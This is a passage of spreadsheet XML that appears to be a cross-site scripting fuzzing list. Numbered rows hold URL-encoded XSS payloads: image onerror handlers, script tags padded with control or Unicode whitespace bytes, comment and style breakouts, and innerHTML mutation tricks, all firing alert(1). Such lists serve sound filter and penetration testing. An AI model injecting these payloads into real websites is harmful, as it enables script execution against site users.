      <c r="B233" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Conerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="3" t="s">
        <v>235</v>
      </c>
      <c r="B234" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx00onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="3" t="s">
        <v>236</v>
      </c>
      <c r="B235" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx27onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="3" t="s">
        <v>237</v>
      </c>
      <c r="B236" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx20onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="3" t="s">
        <v>238</v>
      </c>
      <c r="B237" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx3Bjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5Cx0Djavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="3" t="s">
        <v>239</v>
      </c>
      <c r="B238" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxEF%5CxBB%5CxBFjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx81javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="3" t="s">
        <v>240</v>
      </c>
      <c r="B239" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx84javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE3%5Cx80%5Cx80javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="3" t="s">
        <v>241</v>
      </c>
      <c r="B240" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx09javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx89javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="3" t="s">
        <v>242</v>
      </c>
      <c r="B241" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx85javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx88javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="3" t="s">
        <v>243</v>
      </c>
      <c r="B242" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx00javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5CxA8javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="3" t="s">
        <v>244</v>
      </c>
      <c r="B243" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx8Ajavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE1%5Cx9A%5Cx80javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="3" t="s">
        <v>245</v>
      </c>
      <c r="B244" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx0Cjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5Cx2Bjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="3" t="s">
        <v>246</v>
      </c>
      <c r="B245" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxF0%5Cx90%5Cx96%5Cx9Ajavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E-javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="3" t="s">
        <v>247</v>
      </c>
      <c r="B246" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx0Ajavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5CxAFjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="3" t="s">
        <v>248</v>
      </c>
      <c r="B247" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx7Ejavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx87javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="3" t="s">
        <v>249</v>
      </c>
      <c r="B248" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx81%5Cx9Fjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5CxA9javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="3" t="s">
        <v>250</v>
      </c>
      <c r="B249" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxC2%5Cx85javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxEF%5CxBF%5CxAEjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="3" t="s">
        <v>251</v>
      </c>
      <c r="B250" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx83javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx8Bjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="3" t="s">
        <v>252</v>
      </c>
      <c r="B251" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxEF%5CxBF%5CxBEjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx80javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="3" t="s">
        <v>253</v>
      </c>
      <c r="B252" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx21javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx82javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="3" t="s">
        <v>254</v>
      </c>
      <c r="B253" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx86javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE1%5CxA0%5Cx8Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="3" t="s">
        <v>255</v>
      </c>
      <c r="B254" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx0Bjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5Cx20javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="3" t="s">
        <v>256</v>
      </c>
      <c r="B255" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxC2%5CxA0javascript%3Aalert%281%29%3C%2Fscript%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx0Bjavascript%3Aalert%281%29%5Cx0Bsrc%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="3" t="s">
        <v>257</v>
      </c>
      <c r="B256" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx22javascript%3Aalert%281%29%5Cx22src%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx09javascript%3Aalert%281%29%5Cx09src%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="3" t="s">
        <v>258</v>
      </c>
      <c r="B257" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx27javascript%3Aalert%281%29%5Cx27src%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx0Ajavascript%3Aalert%281%29%5Cx0Asrc%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="3" t="s">
        <v>259</v>
      </c>
      <c r="B258" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx0Cjavascript%3Aalert%281%29%5Cx0Csrc%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx0Djavascript%3Aalert%281%29%5Cx0Dsrc%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="3" t="s">
        <v>260</v>
      </c>
      <c r="B259" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx60javascript%3Aalert%281%29%5Cx60src%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx20javascript%3Aalert%281%29%5Cx20src%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="3" t="s">
        <v>261</v>
      </c>
      <c r="B260" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx2F%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="3" t="s">
        <v>262</v>
      </c>
      <c r="B261" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx20%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="3" t="s">
        <v>263</v>
      </c>
      <c r="B262" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0D%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="3" t="s">
        <v>264</v>
      </c>
      <c r="B263" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0A%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="3" t="s">
        <v>265</v>
      </c>
      <c r="B264" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0C%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="3" t="s">
        <v>266</v>
      </c>
      <c r="B265" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx00%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="3" t="s">
        <v>267</v>
      </c>
      <c r="B266" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx09%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="3" t="s">
        <v>268</v>
      </c>
      <c r="B267" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0B%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="3" t="s">
        <v>269</v>
      </c>
      <c r="B268" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx00%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="3" t="s">
        <v>270</v>
      </c>
      <c r="B269" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0C%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="3" t="s">
        <v>271</v>
      </c>
      <c r="B270" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0D%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="3" t="s">
        <v>272</v>
      </c>
      <c r="B271" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx20%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="3" t="s">
        <v>273</v>
      </c>
      <c r="B272" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0A%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="3" t="s">
        <v>274</v>
      </c>
      <c r="B273" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx09%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="3" t="s">
        <v>275</v>
      </c>
      <c r="B274" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%5Cx00%2Fscript%3E</v>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="3" t="s">
        <v>276</v>
      </c>
      <c r="B275" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%23%20onerror%5Cx3D%22javascript%3Aalert%281%29%22%20%3E</v>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="3" t="s">
        <v>277</v>
      </c>
      <c r="B276" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20onfocus%3Djavascript%3Aalert%281%29%20autofocus%3E</v>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="3" t="s">
        <v>278</v>
      </c>
      <c r="B277" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20onblur%3Djavascript%3Aalert%281%29%20autofocus%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="3" t="s">
        <v>279</v>
      </c>
      <c r="B278" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20poster%3Djavascript%3Ajavascript%3Aalert%281%29%2F%2F</v>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="3" t="s">
        <v>280</v>
      </c>
      <c r="B279" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onscroll%3Djavascript%3Aalert%281%29%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="3" t="s">
        <v>281</v>
      </c>
      <c r="B280" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%20id%3Dtest%20onforminput%3Djavascript%3Aalert%281%29%3E%3Cinput%3E%3C%2Fform%3E%3Cbutton%20form%3Dtest%20onformchange%3Djavascript%3Aalert%281%29%3EX</v>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="3" t="s">
        <v>282</v>
      </c>
      <c r="B281" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="3" t="s">
        <v>283</v>
      </c>
      <c r="B282" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20onerror%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3Csource%3E</v>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="3" t="s">
        <v>284</v>
      </c>
      <c r="B283" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cbutton%20formaction%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EX</v>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="3" t="s">
        <v>285</v>
      </c>
      <c r="B284" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20oninput%3Djavascript%3Aalert%281%29%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="3" t="s">
        <v>286</v>
      </c>
      <c r="B285" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmath%20href%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3ECLICKME%3C%2Fmath%3E%20%20%3Cmath%3E%20%3Cmaction%20actiontype%3D%22statusline%23http%3A%2F%2Fgoogle.com%22%20xlink%3Ahref%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3ECLICKME%3C%2Fmaction%3E%20%3C%2Fmath%3E</v>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="3" t="s">
        <v>287</v>
      </c>
      <c r="B286" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onload%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="3" t="s">
        <v>288</v>
      </c>
      <c r="B287" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctable%20background%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="3" t="s">
        <v>289</v>
      </c>
      <c r="B288" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="3" t="s">
        <v>290</v>
      </c>
      <c r="B289" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ccomment%3E%3Cimg%20src%3D%22%3C%2Fcomment%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="3" t="s">
        <v>291</v>
      </c>
      <c r="B290" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%5B%3E%3Cimg%20src%3D%22%5D%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="3" t="s">
        <v>292</v>
      </c>
      <c r="B291" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3Cimg%20src%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="3" t="s">
        <v>293</v>
      </c>
      <c r="B292" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cli%20style%3Dlist-style%3Aurl%28%29%20onerror%3Djavascript%3Aalert%281%29%3E%20%3Cdiv%20style%3Dcontent%3Aurl%28data%3Aimage%2Fsvg%2Bxml%2C%25%253Csvg%2F%25%253E%29%3Bvisibility%3Ahidden%20onload%3Djavascript%3Aalert%281%29%3E%3C%2Fdiv%3E</v>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="3" t="s">
        <v>294</v>
      </c>
      <c r="B293" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chead%3E%3Cbase%20href%3D%22javascript%3A%2F%2F%22%3E%3C%2Fhead%3E%3Cbody%3E%3Ca%20href%3D%22%2F.%20%2F%2Cjavascript%3Aalert%281%29%2F%2F%23%22%3EXXX%3C%2Fa%3E%3C%2Fbody%3E</v>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="3" t="s">
        <v>295</v>
      </c>
      <c r="B294" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20FOR%3Ddocument%20EVENT%3Donreadystatechange%3Ejavascript%3Aalert%281%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="3" t="s">
        <v>296</v>
      </c>
      <c r="B295" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20CLASSID%3D%22clsid%3A333C7BC4-460F-11D0-BC04-0080C7055A83%22%3E%3CPARAM%20NAME%3D%22DataURL%22%20VALUE%3D%22javascript%3Aalert%281%29%22%3E%3C%2FOBJECT%3E</v>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="3" t="s">
        <v>297</v>
      </c>
      <c r="B296" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3D%22data%3Atext%2Fhtml%3Bbase64%2C%25%28base64%29s%22%3E</v>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="3" t="s">
        <v>298</v>
      </c>
      <c r="B297" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22data%3Atext%2Fhtml%3Bbase64%2C%25%28base64%29s%22%3E</v>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="3" t="s">
        <v>299</v>
      </c>
      <c r="B298" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cb%20%3Cscript%3Ealert%281%29%3C%2Fscript%3E0</v>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="3" t="s">
        <v>300</v>
      </c>
      <c r="B299" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3D%22div1%22%3E%3Cinput%20value%3D%22%60%60onmouseover%3Djavascript%3Aalert%281%29%22%3E%3C%2Fdiv%3E%20%3Cdiv%20id%3D%22div2%22%3E%3C%2Fdiv%3E%3Cscript%3Edocument.getElementById%28%22div2%22%29.innerHTML%20%3D%20document.getElementById%28%22div1%22%29.innerHTML%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="3" t="s">
        <v>301</v>
      </c>
      <c r="B300" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cx%20%27%3D%22foo%22%3E%3Cx%20foo%3D%27%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%27%3E</v>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="3" t="s">
        <v>302</v>
      </c>
      <c r="B301" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="3" t="s">
        <v>303</v>
      </c>
      <c r="B302" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="3" t="s">
        <v>304</v>
      </c>
      <c r="B303" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimage%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="3" t="s">
        <v>305</v>
      </c>
      <c r="B304" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="3" t="s">
        <v>306</v>
      </c>
      <c r="B305" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20style%3Dwidth%3A1px%3Bfilter%3Aglow%20onfilterchange%3Djavascript%3Aalert%281%29%3Ex</v>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="3" t="s">
        <v>307</v>
      </c>
      <c r="B306" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20foo%3D%22%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="3" t="s">
        <v>308</v>
      </c>
      <c r="B307" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%20foo%3D%22%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="3" t="s">
        <v>309</v>
      </c>
      <c r="B308" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%20foo%3D%22%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="3" t="s">
        <v>310</v>
      </c>
      <c r="B309" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20foo%3D%22%3E%3Cx%20foo%3D%27%3F%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%27%3E%22%3E</v>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="3" t="s">
        <v>311</v>
      </c>
      <c r="B310" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%20foo%3D%22%5B%5B%5BInception%5D%5D%22%3E%3Cx%20foo%3D%22%5Dfoo%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="3" t="s">
        <v>312</v>
      </c>
      <c r="B311" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%25%20foo%3E%3Cx%20foo%3D%22%25%3E%3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="3" t="s">
        <v>313</v>
      </c>
      <c r="B312" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20id%3Dd%3E%3Cx%20xmlns%3D%22%3E%3Ciframe%20onload%3Djavascript%3Aalert%281%29%22%3E%3C%2Fdiv%3E%20%3Cscript%3Ed.innerHTML%3Dd.innerHTML%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="3" t="s">
        <v>314</v>
      </c>
      <c r="B313" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx00src%3Dx%20onerror%3D%22alert%281%29%22%3E</v>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="3" t="s">
        <v>315</v>
      </c>
      <c r="B314" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="3" t="s">
        <v>316</v>
      </c>
      <c r="B315" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx11src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="3" t="s">
        <v>317</v>
      </c>
      <c r="B316" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20%5Cx12src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="3" t="s">
        <v>318</v>
      </c>
      <c r="B317" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx47src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="3" t="s">
        <v>319</v>
      </c>
      <c r="B318" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx10src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="3" t="s">
        <v>320</v>
      </c>
      <c r="B319" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%5Cx13src%3Dx%20onerror%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="320">
